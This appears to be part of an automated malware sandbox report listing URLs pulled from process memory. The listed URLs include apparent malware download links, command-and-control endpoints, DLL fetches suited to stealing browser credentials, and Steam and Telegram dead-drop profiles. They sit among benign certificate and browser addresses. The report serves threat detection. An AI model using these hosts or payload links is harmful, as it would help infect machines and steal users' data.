Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exe
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeD
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeG
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exeata;
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2ae906657_snd.exef
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe2
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exe=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeX
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2afc5abea_vasd.exeta;
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3026337297.0000000000FDA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe%
Source: RegAsm.exe, 00000012.00000002.3023059126.000000000045A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe00Start4
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe1kkkk1253403http://files.veritas.org.ng/ldms/
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe6
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exe?9
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeG
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exei
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exeta;
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000101E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://files.veritas.org.ng/ldms/66fa2b049020f_ldnf.exez
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0A
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0C
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0N
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.00000000012BB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/#
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/6
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/6z
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/9z
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/U
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/ZHh
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/freebl3.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/i
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/mozglue.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/mozglue.dllT
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/msvcp140.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/msvcp140.dll6
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/nss3.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/nss3.dllF
Source: RegAsm.exe, 0000000E.00000002.2863943868.000000000127A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/ping
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/softokn3.dll
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/sql.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/sql.dllLMEM8(
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001231000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/u
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/vcruntime140.dll
Source: RegAsm.exe, 0000001B.00000002.2766184934.0000000001388000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com/z
Source: RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.00000000004E6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80
Source: RegAsm.exe, 0000000E.00000002.2861588723.00000000004C5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80/2024
Source: RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:805938.134
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80AKE
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80AKEsrss.exe
Source: RegAsm.exe, 00000003.00000002.2592313057.000000000059C000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80GCA
Source: RegAsm.exe, 0000000E.00000002.2861588723.00000000004C5000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80Lggz.exe
Source: RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80acPdLggz.exe
Source: RegAsm.exe, 0000000E.00000002.2861588723.000000000059C000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2861588723.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.00000000004E6000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.0000000000503000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80ta
Source: RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://urusvisa.com:80xe
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.digicert.com/CPS0
Source: RegAsm.exe, RegAsm.exe, 00000003.00000002.2662400593.000000006C58D000.00000002.00000001.01000000.00000009.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000003.00000002.2624308757.000000002038D000.00000002.00001000.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2603031796.000000001A3EA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3043954792.000000001B33C000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3066275047.0000000061ED3000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://agentyanlark.site/api
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bellykmrebk.site/apij
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696484494400800000.2&ci=1696484494189.
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696484494400800000.1&ci=1696484494189.12791&cta
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/M
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014A2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/o
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store/q
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://chaptermusu.store:443/api
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=nSnUuYf7g6U1&a
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=PzKBszTg
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=WnGP
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: RegAsm.exe, 00000003.00000002.2595193937.0000000001654000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.0000000001502000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://delaylacedmn.site/api
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: RegAsm.exe, 00000012.00000002.3026337297.000000000103E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000012.00000002.3051565260.00000000273B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: RegAsm.exe, 00000003.00000002.2624921125.00000000207B7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2652017449.000000003E4EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2628819471.0000000026721000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2645077224.000000003260A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000146F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/A
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/i
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/badges
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199724331900/inventory/
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199780418869u55uMozilla/5.0
Source: RegAsm.exe, 0000000A.00000002.2584297027.000000000144E000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000A.00000002.2585204810.00000000014F5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000003.00000002.2602299616.0000000019E6C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/N
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/ae5ed
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/i
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2861588723.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.00000000011BA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2762920375.000000000048F000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlg
Source: RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgT9
Source: file.exe, 00000000.00000002.2113832701.0000000003CE5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2592313057.0000000000400000.00000040.00000400.00020000.00000000.sdmp, EGDGCGCFHI.exe, 0000000B.00000002.2560292223.000000000440B000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgfjnsdajbgfq12gdhttps://steamcommunity.com/profiles/76561199780418869u55uhttps:/
Source: RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://t.me/jamsemlgu
Source: RegAsm.exe, 0000000A.00000002.2584297027.0000000001462000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://underlinemdsj.site/icatl
Source: RegAsm.exe, 00000003.00000002.2592313057.0000000000481000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.2595193937.00000000014D6000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.2863943868.0000000001200000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.2766184934.000000000132B000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://web.telegram.org
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/api
Source: RegAsm.exe, 0000000A.00000002.2584999603.00000000014B1000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://writekdmsnu.site/apim1L
